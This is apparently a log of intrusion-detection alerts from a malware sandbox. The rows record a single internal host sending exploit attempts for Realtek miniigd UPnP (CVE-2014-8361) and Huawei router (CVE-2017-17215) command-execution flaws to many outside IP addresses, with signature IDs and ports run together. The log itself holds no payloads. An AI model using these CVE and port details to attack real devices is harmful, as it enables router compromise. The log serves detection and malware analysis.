                                      07/20/24-23:01:59.850516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5644652869192.168.2.2364.55.184.24
                                      07/20/24-23:01:58.460651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3932452869192.168.2.23217.154.142.187
                                      07/20/24-23:01:08.574948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4683052869192.168.2.234.131.130.12
                                      07/20/24-23:01:41.392528TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615327052869192.168.2.23185.161.24.118
                                      07/20/24-23:01:07.062666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820637215192.168.2.23197.216.11.202
                                      07/20/24-23:01:43.328792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615067652869192.168.2.23174.138.8.92
                                      07/20/24-23:01:48.924853TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3990252869192.168.2.23146.33.84.180
                                      07/20/24-23:01:50.131564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615143652869192.168.2.23105.84.86.167
                                      07/20/24-23:02:08.135557TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5315252869192.168.2.23132.64.30.154
                                      07/20/24-23:01:12.806645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24002652869192.168.2.2344.76.102.214
                                      07/20/24-23:01:01.630356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5684052869192.168.2.2342.114.143.158
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433837215192.168.2.23157.215.58.156
                                      07/20/24-23:00:57.222164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480837215192.168.2.2341.19.255.66
                                      07/20/24-23:00:57.222207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471837215192.168.2.23197.89.108.63
                                      07/20/24-23:01:47.535939TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615378452869192.168.2.23129.40.249.193
                                      07/20/24-23:01:52.242138TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24711852869192.168.2.238.220.8.58
                                      07/20/24-23:01:42.727936TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614304852869192.168.2.23128.128.73.171
                                      07/20/24-23:01:45.827400TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24106252869192.168.2.23126.163.211.196
                                      07/20/24-23:01:57.297792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615470452869192.168.2.23204.80.169.189
                                      07/20/24-23:01:08.684499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24580452869192.168.2.23186.40.176.32
                                      07/20/24-23:01:08.578116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3393852869192.168.2.23188.112.254.56
                                      07/20/24-23:01:27.650975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113237215192.168.2.23123.227.180.114
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370837215192.168.2.23157.159.217.211
                                      07/20/24-23:01:45.500918TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613979452869192.168.2.23104.226.237.113
                                      07/20/24-23:01:43.203681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613961652869192.168.2.23169.102.32.106
                                      07/20/24-23:01:47.692050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4211452869192.168.2.23189.225.243.103
                                      07/20/24-23:01:52.826575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24719452869192.168.2.2387.75.190.2
                                      07/20/24-23:01:53.357099TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25304452869192.168.2.23167.225.20.24
                                      07/20/24-23:01:34.043964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849837215192.168.2.2341.241.47.119
                                      07/20/24-23:01:45.947642TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25640252869192.168.2.23185.117.12.122
                                      07/20/24-23:02:01.280564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4199652869192.168.2.23157.246.241.121
                                      07/20/24-23:01:58.945733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5197852869192.168.2.2348.97.254.151
                                      07/20/24-23:01:49.040108TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26064852869192.168.2.2373.50.29.53
                                      07/20/24-23:01:45.923449TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613899652869192.168.2.23169.122.121.121
                                      07/20/24-23:01:56.910590TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24670252869192.168.2.23128.36.26.52
                                      07/20/24-23:01:01.363756TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4526852869192.168.2.23109.80.210.12
                                      07/20/24-23:01:08.597662TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25053652869192.168.2.2398.176.193.82
                                      07/20/24-23:02:00.868779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4366652869192.168.2.23158.218.4.185
                                      07/20/24-23:01:41.340201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615692452869192.168.2.23182.49.153.25
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793837215192.168.2.23157.210.25.215
                                      07/20/24-23:01:01.157005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4441452869192.168.2.2312.55.180.198
                                      07/20/24-23:01:04.212553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055237215192.168.2.2338.140.206.136
                                      07/20/24-23:01:08.565610TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25003452869192.168.2.2360.63.234.192
                                      07/20/24-23:01:31.320679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25088652869192.168.2.23156.32.87.120
                                      07/20/24-23:01:41.474539TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614939452869192.168.2.2319.135.72.216
                                      07/20/24-23:01:42.592736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3552052869192.168.2.23103.218.156.193
                                      07/20/24-23:01:06.996056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635637215192.168.2.2370.98.158.86
                                      07/20/24-23:01:46.158533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457052869192.168.2.2363.237.109.125
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966637215192.168.2.23197.28.251.253
                                      07/20/24-23:01:42.437265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25665852869192.168.2.23102.22.43.107
                                      07/20/24-23:01:44.514415TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24063852869192.168.2.2358.25.190.68
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486437215192.168.2.23197.115.124.156
                                      07/20/24-23:01:10.763630TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3686052869192.168.2.23104.80.144.32
                                      07/20/24-23:01:31.314147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25858852869192.168.2.23184.170.117.213
                                      07/20/24-23:01:02.755930TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4405652869192.168.2.2338.158.187.83
                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.2341.102.199.133
                                      07/20/24-23:01:04.621319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4980852869192.168.2.23107.208.110.238
                                      07/20/24-23:01:44.838946TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24702652869192.168.2.23169.196.10.52
                                      07/20/24-23:01:08.634900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24819652869192.168.2.23129.194.41.40
                                      07/20/24-23:01:55.105161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4033252869192.168.2.2362.211.74.184
                                      07/20/24-23:01:34.045144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091837215192.168.2.2341.42.73.158
                                      07/20/24-23:01:31.320679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777452869192.168.2.2345.144.124.12
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255637215192.168.2.23157.164.227.86
                                      07/20/24-23:01:10.517854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615803852869192.168.2.23183.125.8.233
                                      07/20/24-23:01:43.243266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615967252869192.168.2.23142.215.251.21
                                      07/20/24-23:01:26.734319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5138652869192.168.2.23143.38.216.11
                                      07/20/24-23:01:31.318207TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23303852869192.168.2.23155.220.6.134
                                      07/20/24-23:01:04.113037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101637215192.168.2.23157.8.213.94
                                      07/20/24-23:01:44.001231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644652869192.168.2.23145.102.1.140
                                      07/20/24-23:01:49.172806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3586052869192.168.2.23163.195.26.201
                                      07/20/24-23:01:08.638879TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25618252869192.168.2.23148.211.13.100
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084037215192.168.2.2337.233.245.194
                                      07/20/24-23:01:31.983105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864437215192.168.2.23157.75.39.95
                                      07/20/24-23:01:45.713934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4214452869192.168.2.23201.140.184.210
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407037215192.168.2.23197.77.47.158
                                      07/20/24-23:01:20.593640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25857452869192.168.2.23140.34.53.233
                                      07/20/24-23:01:45.095767TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613597252869192.168.2.23210.199.180.209
                                      07/20/24-23:00:59.175742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893237215192.168.2.23157.211.77.112
                                      07/20/24-23:01:04.982233TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613392452869192.168.2.23168.229.219.185
                                      07/20/24-23:01:44.814790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5502252869192.168.2.23119.211.191.173
                                      07/20/24-23:01:47.990801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614399252869192.168.2.23208.128.19.202
                                      07/20/24-23:01:42.115230TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26069852869192.168.2.23137.127.2.156
                                      07/20/24-23:01:47.798104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4415252869192.168.2.23192.50.131.250
                                      07/20/24-23:01:50.169961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24339452869192.168.2.2354.182.169.174
                                      07/20/24-23:01:07.018425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927637215192.168.2.23162.118.10.225
                                      07/20/24-23:01:42.616435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002652869192.168.2.2319.135.72.216
                                      07/20/24-23:01:42.758954TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6055652869192.168.2.23187.33.239.16
                                      07/20/24-23:01:58.624224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6047452869192.168.2.23188.52.23.162
                                      07/20/24-23:01:08.565610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6039852869192.168.2.23184.112.202.180
                                      07/20/24-23:01:42.422050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6096052869192.168.2.23162.207.42.25
                                      07/20/24-23:01:47.644828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582852869192.168.2.2390.205.27.15
                                      07/20/24-23:01:08.626717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3463252869192.168.2.23124.254.84.115
                                      07/20/24-23:01:58.249042TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23321252869192.168.2.23163.245.29.116
                                      07/20/24-23:02:51.152216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5102052869192.168.2.23106.28.132.38
                                      07/20/24-23:02:53.715694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613832652869192.168.2.2373.65.166.64
                                      07/20/24-23:01:40.311124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666637215192.168.2.2341.58.91.210
                                      07/20/24-23:01:46.512162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613684452869192.168.2.2397.80.44.168
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997637215192.168.2.2341.33.245.21
                                      07/20/24-23:01:54.562310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3535052869192.168.2.23108.242.179.170
                                      07/20/24-23:00:57.221530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770837215192.168.2.2341.143.175.164
                                      07/20/24-23:01:41.648203TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24172852869192.168.2.23150.183.54.123
                                      07/20/24-23:01:27.677519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063437215192.168.2.23157.27.123.11
                                      07/20/24-23:00:57.222091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590637215192.168.2.23197.159.88.79
                                      07/20/24-23:01:01.892361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615735852869192.168.2.23218.167.11.188
                                      07/20/24-23:02:07.942303TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615311852869192.168.2.23167.225.66.116
                                      07/20/24-23:01:31.320338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4007652869192.168.2.23105.131.75.237
                                      07/20/24-23:01:12.806062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4625052869192.168.2.2338.189.198.237
                                      07/20/24-23:01:25.484881TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615990652869192.168.2.2379.157.163.186
                                      07/20/24-23:01:41.370228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5864252869192.168.2.2348.9.123.124
                                      07/20/24-23:01:43.182734TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615008852869192.168.2.23173.1.18.208
                                      07/20/24-23:02:01.256492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615158052869192.168.2.2357.77.183.106
                                      07/20/24-23:02:20.472956TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25614052869192.168.2.2314.149.133.62
                                      07/20/24-23:01:45.887574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615821852869192.168.2.23133.73.57.190
                                      07/20/24-23:01:53.384793TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614620652869192.168.2.2349.96.236.62
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998437215192.168.2.23197.57.36.21
                                      07/20/24-23:01:52.735812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24176052869192.168.2.23158.249.141.193
                                      07/20/24-23:01:42.262355TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613477852869192.168.2.23137.218.170.227
                                      07/20/24-23:01:11.822392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685237215192.168.2.2360.49.240.179
                                      07/20/24-23:02:37.123706TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613691452869192.168.2.23123.137.152.162
                                      07/20/24-23:01:01.326437TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4844852869192.168.2.23191.79.195.70
                                      07/20/24-23:02:02.537098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4121652869192.168.2.2396.158.44.47
                                      07/20/24-23:01:03.247233TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615391852869192.168.2.23148.211.13.100
                                      07/20/24-23:01:04.228868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336237215192.168.2.23182.253.24.216
                                      07/20/24-23:01:43.190671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614593452869192.168.2.23130.131.47.204
                                      07/20/24-23:01:20.110860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843837215192.168.2.2341.111.23.136
                                      07/20/24-23:01:50.798234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5657652869192.168.2.23152.241.189.22
                                      07/20/24-23:01:44.839991TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3815052869192.168.2.2325.245.127.235
                                      07/20/24-23:01:04.064240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668037215192.168.2.23157.38.58.237
                                      07/20/24-23:01:02.504282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614392852869192.168.2.23169.107.25.12
                                      07/20/24-23:01:04.064240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901637215192.168.2.23157.161.162.111
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070037215192.168.2.2383.201.55.21
                                      07/20/24-23:01:43.111685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3922652869192.168.2.238.242.14.128
                                      07/20/24-23:01:42.042815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5164452869192.168.2.23114.234.94.36
                                      07/20/24-23:01:51.266338TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615985252869192.168.2.23141.3.146.221
                                      07/20/24-23:01:31.333805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4739852869192.168.2.232.17.25.163
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284237215192.168.2.2341.132.51.195
                                      07/20/24-23:01:43.425298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4380652869192.168.2.23172.124.39.209
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636037215192.168.2.23157.143.99.221
                                      07/20/24-23:01:42.672378TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24031052869192.168.2.2347.91.11.144
                                      07/20/24-23:01:27.650643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751437215192.168.2.232.228.199.145
                                      07/20/24-23:01:50.903844TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24062052869192.168.2.2342.169.174.111
                                      07/20/24-23:01:57.787786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4199252869192.168.2.23188.56.34.102
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493437215192.168.2.23197.160.155.29
                                      07/20/24-23:01:02.079114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394037215192.168.2.23147.234.115.27
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531637215192.168.2.2390.115.47.151
                                      07/20/24-23:01:52.686542TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25160652869192.168.2.23206.50.68.232
                                      07/20/24-23:01:48.560945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614341452869192.168.2.23158.244.111.55
                                      07/20/24-23:01:04.039129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276237215192.168.2.23173.164.252.237
                                      07/20/24-23:01:47.005094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4935852869192.168.2.23123.198.127.136
                                      07/20/24-23:01:34.048618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915637215192.168.2.2341.183.23.205
                                      07/20/24-23:01:31.312311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4408652869192.168.2.23179.40.74.15
                                      07/20/24-23:01:41.750477TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3715852869192.168.2.23113.184.252.189
                                      07/20/24-23:01:43.209467TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614390652869192.168.2.23180.49.147.96
                                      07/20/24-23:01:43.944379TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387252869192.168.2.23175.186.207.187
                                      07/20/24-23:01:56.353592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4645652869192.168.2.2343.127.30.131
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4006037215192.168.2.23197.158.235.29
                                      07/20/24-23:01:53.494330TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616081252869192.168.2.23115.121.114.198
                                      07/20/24-23:01:21.936545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286037215192.168.2.2364.35.212.13
                                      07/20/24-23:01:52.447066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5585852869192.168.2.23145.241.92.58
                                      07/20/24-23:01:41.991545TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5557052869192.168.2.23191.59.254.237
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135037215192.168.2.23137.161.38.152
                                      07/20/24-23:01:02.109665TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614088252869192.168.2.2391.33.144.77
                                      07/20/24-23:01:14.296756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334837215192.168.2.2341.215.255.246
                                      07/20/24-23:01:24.884598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521837215192.168.2.2398.114.190.226
                                      07/20/24-23:01:45.683188TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24912852869192.168.2.2366.34.14.57
                                      07/20/24-23:00:59.184421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155037215192.168.2.2341.166.159.225
                                      07/20/24-23:01:43.167781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613347052869192.168.2.2364.212.158.191
                                      07/20/24-23:01:44.161942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4725052869192.168.2.2318.7.171.33
                                      07/20/24-23:00:57.221803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.2341.173.160.14
                                      07/20/24-23:01:34.064573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069637215192.168.2.23157.124.21.88
                                      07/20/24-23:01:42.131607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5389252869192.168.2.2323.3.191.75
                                      07/20/24-23:01:21.952783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215637215192.168.2.2341.178.228.29
                                      07/20/24-23:01:42.962388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613696852869192.168.2.23199.44.188.95
                                      07/20/24-23:01:43.825431TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5843452869192.168.2.2324.200.205.123
                                      07/20/24-23:01:57.022868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3446652869192.168.2.2368.238.48.34
                                      07/20/24-23:02:04.022245TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615137852869192.168.2.23212.213.14.74
                                      07/20/24-23:01:44.611556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5355252869192.168.2.23144.196.193.162
                                      07/20/24-23:01:45.484487TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615179852869192.168.2.23210.209.80.73
